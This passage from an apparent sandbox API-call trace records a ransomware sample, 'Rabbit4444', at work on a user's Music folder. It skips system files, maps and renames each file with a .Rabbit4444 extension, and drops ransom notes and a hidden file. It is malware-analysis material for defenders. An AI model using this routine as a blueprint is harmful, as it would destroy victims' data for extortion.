lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.350] lstrcmpiW (lpString1="Iq3Mk4kIcDleAb4.wav", lpString2="Rabbit4444.exe") returned -1 [0049.350] lstrcmpiW (lpString1="Iq3Mk4kIcDleAb4.wav", lpString2=".") returned 1 [0049.350] lstrcmpiW (lpString1="Iq3Mk4kIcDleAb4.wav", lpString2="..") returned 1 [0049.350] lstrcmpiW (lpString1="Iq3Mk4kIcDleAb4.wav", lpString2="windows") returned -1 [0049.350] lstrcmpiW (lpString1="Iq3Mk4kIcDleAb4.wav", lpString2="bootmgr") returned 1 [0049.350] lstrcmpiW (lpString1="Iq3Mk4kIcDleAb4.wav", lpString2="pagefile.sys") returned -1 [0049.350] lstrcmpiW (lpString1="Iq3Mk4kIcDleAb4.wav", lpString2="boot") returned 1 [0049.350] lstrcmpiW (lpString1="Iq3Mk4kIcDleAb4.wav", lpString2="ids.txt") returned 1 [0049.350] lstrcmpiW (lpString1="Iq3Mk4kIcDleAb4.wav", lpString2="NTUSER.DAT") returned -1 [0049.350] lstrcpyW (in: lpString1=0x130eb74, lpString2="Iq3Mk4kIcDleAb4.wav" | out: lpString1="Iq3Mk4kIcDleAb4.wav") returned="Iq3Mk4kIcDleAb4.wav" [0049.350] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\atFhmMZ\\Iq3Mk4kIcDleAb4.wav", dwFileAttributes=0x0) returned 1 [0049.350] lstrlenW (lpString="Iq3Mk4kIcDleAb4.wav") returned 19 [0049.350] lstrlenW (lpString="Rabbit4444") returned 10 [0049.350] lstrcmpiW (lpString1="DleAb4.wav", lpString2="Rabbit4444") returned -1 [0049.350] lstrlenW (lpString=".dll") returned 4 [0049.350] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0049.350] lstrlenW (lpString=".lnk") returned 4 [0049.350] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0049.350] lstrlenW (lpString=".ini") returned 4 [0049.350] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0049.350] lstrlenW (lpString=".sys") returned 4 [0049.350] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0049.350] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\atFhmMZ\\Iq3Mk4kIcDleAb4.wav" (normalized: "c:\\users\\fd1hvy\\music\\atfhmmz\\iq3mk4kicdleab4.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.350] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.350] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14066125566) returned 1 [0049.351] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=14440) returned 1 [0049.351] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0049.351] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0049.351] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3b70, lpName=0x0) returned 0x298 [0049.351] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3b70) returned 0x70000 [0049.351] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.351] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0049.351] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.351] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0049.352] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.352] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0049.352] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.352] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0049.352] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14066264099) returned 1 [0049.352] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0049.352] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0049.352] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.352] CloseHandle (hObject=0x298) returned 1 [0049.352] CloseHandle (hObject=0x278) returned 1 [0049.354] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\atFhmMZ\\Iq3Mk4kIcDleAb4.wav.Rabbit4444") returned 60 [0049.354] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\atFhmMZ\\Iq3Mk4kIcDleAb4.wav" (normalized: "c:\\users\\fd1hvy\\music\\atfhmmz\\iq3mk4kicdleab4.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\atFhmMZ\\Iq3Mk4kIcDleAb4.wav.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\atfhmmz\\iq3mk4kicdleab4.wav.rabbit4444"), dwFlags=0x1) returned 1 [0049.354] InterlockedExchangeAdd (in: Addend=0xff618, Value=14448 | out: Addend=0xff618) returned 20880496 [0049.354] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3573 [0049.354] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a2e0a90, ftCreationTime.dwHighDateTime=0x1d4d041, ftLastAccessTime.dwLowDateTime=0xcf3408d0, ftLastAccessTime.dwHighDateTime=0x1d4ce01, ftLastWriteTime.dwLowDateTime=0xcf3408d0, ftLastWriteTime.dwHighDateTime=0x1d4ce01, nFileSizeHigh=0x0, nFileSizeLow=0x17c89, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jG41f5VsquvTqCZwY.wav", cAlternateFileName="JG41F5~1.WAV")) returned 1 [0049.354] lstrcmpiW (lpString1="jG41f5VsquvTqCZwY.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.354] lstrcmpiW (lpString1="jG41f5VsquvTqCZwY.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.354] lstrcmpiW (lpString1="jG41f5VsquvTqCZwY.wav", lpString2="Rabbit4444.exe") returned -1 [0049.354] lstrcmpiW (lpString1="jG41f5VsquvTqCZwY.wav", lpString2=".") returned 1 [0049.354] lstrcmpiW (lpString1="jG41f5VsquvTqCZwY.wav", lpString2="..") returned 1 [0049.354] lstrcmpiW (lpString1="jG41f5VsquvTqCZwY.wav", lpString2="windows") returned -1 [0049.354] lstrcmpiW (lpString1="jG41f5VsquvTqCZwY.wav", lpString2="bootmgr") returned 1 [0049.354] lstrcmpiW (lpString1="jG41f5VsquvTqCZwY.wav", lpString2="pagefile.sys") returned -1 [0049.355] lstrcmpiW (lpString1="jG41f5VsquvTqCZwY.wav", lpString2="boot") returned 1 [0049.355] lstrcmpiW (lpString1="jG41f5VsquvTqCZwY.wav", lpString2="ids.txt") returned 1 [0049.355] lstrcmpiW (lpString1="jG41f5VsquvTqCZwY.wav", lpString2="NTUSER.DAT") returned -1 [0049.355] lstrcpyW (in: lpString1=0x130eb74, lpString2="jG41f5VsquvTqCZwY.wav" | out: lpString1="jG41f5VsquvTqCZwY.wav") returned="jG41f5VsquvTqCZwY.wav" [0049.355] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\atFhmMZ\\jG41f5VsquvTqCZwY.wav", dwFileAttributes=0x0) returned 1 [0049.355] lstrlenW (lpString="jG41f5VsquvTqCZwY.wav") returned 21 [0049.355] lstrlenW (lpString="Rabbit4444") returned 10 [0049.355] lstrcmpiW (lpString1="TqCZwY.wav", lpString2="Rabbit4444") returned 1 [0049.355] lstrlenW (lpString=".dll") returned 4 [0049.355] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0049.355] lstrlenW (lpString=".lnk") returned 4 [0049.355] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0049.355] lstrlenW (lpString=".ini") returned 4 [0049.355] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0049.355] lstrlenW (lpString=".sys") returned 4 [0049.355] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0049.355] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\atFhmMZ\\jG41f5VsquvTqCZwY.wav" (normalized: "c:\\users\\fd1hvy\\music\\atfhmmz\\jg41f5vsquvtqczwy.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.355] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.355] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14066602039) returned 1 [0049.355] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=97417) returned 1 [0049.355] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0049.355] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0049.355] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x17f90, lpName=0x0) returned 0x298 [0049.356] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17f90) returned 0x70000 [0049.358] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.358] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0049.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.358] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0049.358] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0049.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0049.358] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14066912330) returned 1 [0049.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0049.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0049.358] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.359] CloseHandle (hObject=0x298) returned 1 [0049.359] CloseHandle (hObject=0x278) returned 1 [0049.362] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\atFhmMZ\\jG41f5VsquvTqCZwY.wav.Rabbit4444") returned 62 [0049.362] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\atFhmMZ\\jG41f5VsquvTqCZwY.wav" (normalized: "c:\\users\\fd1hvy\\music\\atfhmmz\\jg41f5vsquvtqczwy.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\atFhmMZ\\jG41f5VsquvTqCZwY.wav.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\atfhmmz\\jg41f5vsquvtqczwy.wav.rabbit4444"), dwFlags=0x1) returned 1 [0049.363] InterlockedExchangeAdd (in: Addend=0xff618, Value=97424 | out: Addend=0xff618) returned 20894944 [0049.363] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 3574 [0049.363] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x150cb10, ftCreationTime.dwHighDateTime=0x1d4ccc6, ftLastAccessTime.dwLowDateTime=0x3027dc0, ftLastAccessTime.dwHighDateTime=0x1d4d06b, ftLastWriteTime.dwLowDateTime=0x3027dc0, ftLastWriteTime.dwHighDateTime=0x1d4d06b, nFileSizeHigh=0x0, nFileSizeLow=0x16a5e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kQd6LBtQrAN6lnmGB.mp3", cAlternateFileName="KQD6LB~1.MP3")) returned 1 [0049.363] lstrcmpiW (lpString1="kQd6LBtQrAN6lnmGB.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.363] lstrcmpiW (lpString1="kQd6LBtQrAN6lnmGB.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.363] lstrcmpiW (lpString1="kQd6LBtQrAN6lnmGB.mp3", lpString2="Rabbit4444.exe") returned -1 [0049.363] lstrcmpiW (lpString1="kQd6LBtQrAN6lnmGB.mp3", lpString2=".") returned 1 [0049.363] lstrcmpiW (lpString1="kQd6LBtQrAN6lnmGB.mp3", lpString2="..") returned 1 [0049.363] lstrcmpiW (lpString1="kQd6LBtQrAN6lnmGB.mp3", lpString2="windows") returned -1 [0049.363] lstrcmpiW (lpString1="kQd6LBtQrAN6lnmGB.mp3", lpString2="bootmgr") returned 1 [0049.363] lstrcmpiW (lpString1="kQd6LBtQrAN6lnmGB.mp3", lpString2="pagefile.sys") returned -1 [0049.363] lstrcmpiW (lpString1="kQd6LBtQrAN6lnmGB.mp3", lpString2="boot") returned 1 [0049.363] lstrcmpiW (lpString1="kQd6LBtQrAN6lnmGB.mp3", lpString2="ids.txt") returned 1 [0049.363] lstrcmpiW (lpString1="kQd6LBtQrAN6lnmGB.mp3", lpString2="NTUSER.DAT") returned -1 [0049.363] lstrcpyW (in: lpString1=0x130eb74, lpString2="kQd6LBtQrAN6lnmGB.mp3" | out: lpString1="kQd6LBtQrAN6lnmGB.mp3") returned="kQd6LBtQrAN6lnmGB.mp3" [0049.363] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\atFhmMZ\\kQd6LBtQrAN6lnmGB.mp3", dwFileAttributes=0x0) returned 1 [0049.363] lstrlenW (lpString="kQd6LBtQrAN6lnmGB.mp3") returned 21 [0049.363] lstrlenW (lpString="Rabbit4444") returned 10 [0049.363] lstrcmpiW (lpString1="6lnmGB.mp3", lpString2="Rabbit4444") returned -1 [0049.363] lstrlenW (lpString=".dll") returned 4 [0049.363] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0049.363] lstrlenW (lpString=".lnk") returned 4 [0049.364] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0049.364] lstrlenW (lpString=".ini") returned 4 [0049.364] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0049.364] lstrlenW (lpString=".sys") returned 4 [0049.364] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0049.364] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\atFhmMZ\\kQd6LBtQrAN6lnmGB.mp3" (normalized: "c:\\users\\fd1hvy\\music\\atfhmmz\\kqd6lbtqran6lnmgb.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.364] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.364] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14067456879) returned 1 [0049.364] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=92766) returned 1 [0049.364] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0049.364] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0049.364] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x16d60, lpName=0x0) returned 0x298 [0049.364] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16d60) returned 0x70000 [0049.366] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.366] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0049.366] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.366] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0049.366] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.367] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0049.367] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.367] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0049.367] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14067749418) returned 1 [0049.367] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0049.367] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0049.367] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.368] CloseHandle (hObject=0x298) returned 1 [0049.368] CloseHandle (hObject=0x278) returned 1 [0049.371] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\atFhmMZ\\kQd6LBtQrAN6lnmGB.mp3.Rabbit4444") returned 62 [0049.371] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\atFhmMZ\\kQd6LBtQrAN6lnmGB.mp3" (normalized: "c:\\users\\fd1hvy\\music\\atfhmmz\\kqd6lbtqran6lnmgb.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\atFhmMZ\\kQd6LBtQrAN6lnmGB.mp3.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\atfhmmz\\kqd6lbtqran6lnmgb.mp3.rabbit4444"), dwFlags=0x1) returned 1 [0049.371] InterlockedExchangeAdd (in: Addend=0xff618, Value=92768 | out: Addend=0xff618) returned 20992368 [0049.371] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3577 [0049.371] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x150cb10, ftCreationTime.dwHighDateTime=0x1d4ccc6, ftLastAccessTime.dwLowDateTime=0x3027dc0, ftLastAccessTime.dwHighDateTime=0x1d4d06b, ftLastWriteTime.dwLowDateTime=0x3027dc0, ftLastWriteTime.dwHighDateTime=0x1d4d06b, nFileSizeHigh=0x0, nFileSizeLow=0x16a5e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kQd6LBtQrAN6lnmGB.mp3", cAlternateFileName="KQD6LB~1.MP3")) returned 0 [0049.371] FindClose (in: hFindFile=0x102990 | out: hFindFile=0x102990) returned 1 [0049.371] lstrcpyW (in: lpString1=0x130eb74, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0049.371] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\atFhmMZ\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\music\\atfhmmz\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0049.372] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0049.372] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0049.373] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.373] CloseHandle (hObject=0x278) returned 1 [0049.373] CloseHandle (hObject=0x27c) returned 1 [0049.374] GetCurrentThreadId () returned 0xd98 [0049.374] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6670 [0049.375] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Music\\3yy255AddCwO6CDe", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Music\\3yy255AddCwO6CDe") returned="C:\\Users\\FD1HVy\\Music\\3yy255AddCwO6CDe" [0049.375] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10cd98 | out: hHeap=0xe0000) returned 1 [0049.375] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6668 | out: hHeap=0xe0000) returned 1 [0049.375] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Music\\3yy255AddCwO6CDe" | out: lpString1="C:\\Users\\FD1HVy\\Music\\3yy255AddCwO6CDe") returned="C:\\Users\\FD1HVy\\Music\\3yy255AddCwO6CDe" [0049.375] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\3yy255AddCwO6CDe", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Music\\3yy255AddCwO6CDe\\") returned="C:\\Users\\FD1HVy\\Music\\3yy255AddCwO6CDe\\" [0049.375] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\3yy255AddCwO6CDe\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Music\\3yy255AddCwO6CDe\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Music\\3yy255AddCwO6CDe\\.BFC0E91B00AE8A0620D3" [0049.375] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\3yy255AddCwO6CDe\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\music\\3yy255addcwo6cde\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0049.376] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0049.378] FlushFileBuffers (hFile=0x27c) returned 1 [0049.379] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\3yy255AddCwO6CDe\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0049.379] CloseHandle (hObject=0x27c) returned 1 [0049.380] lstrlenW (lpString="C:\\Users\\FD1HVy\\Music\\3yy255AddCwO6CDe") returned 38 [0049.380] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0049.380] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\3yy255AddCwO6CDe\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x534d57b0, ftCreationTime.dwHighDateTime=0x1d4d155, ftLastAccessTime.dwLowDateTime=0x6f888710, ftLastAccessTime.dwHighDateTime=0x1d4caca, ftLastWriteTime.dwLowDateTime=0xe6c1a7a2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102810 [0049.380] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.380] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.380] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0049.380] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0049.380] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x534d57b0, ftCreationTime.dwHighDateTime=0x1d4d155, ftLastAccessTime.dwLowDateTime=0x6f888710, ftLastAccessTime.dwHighDateTime=0x1d4caca, ftLastWriteTime.dwLowDateTime=0xe6c1a7a2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.380] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.380] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.380] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0049.380] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0049.380] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0049.380] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe6c1a7a2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe6c1a7a2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe6c1a7a2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0049.380] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.380] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0049.380] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe6c1a7a2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe6c1a7a2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe6c1a7a2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0049.380] FindClose (in: hFindFile=0x102810 | out: hFindFile=0x102810) returned 1 [0049.381] lstrcpyW (in: lpString1=0x130eb86, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0049.381] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\3yy255AddCwO6CDe\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\music\\3yy255addcwo6cde\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0049.381] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0049.381] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, 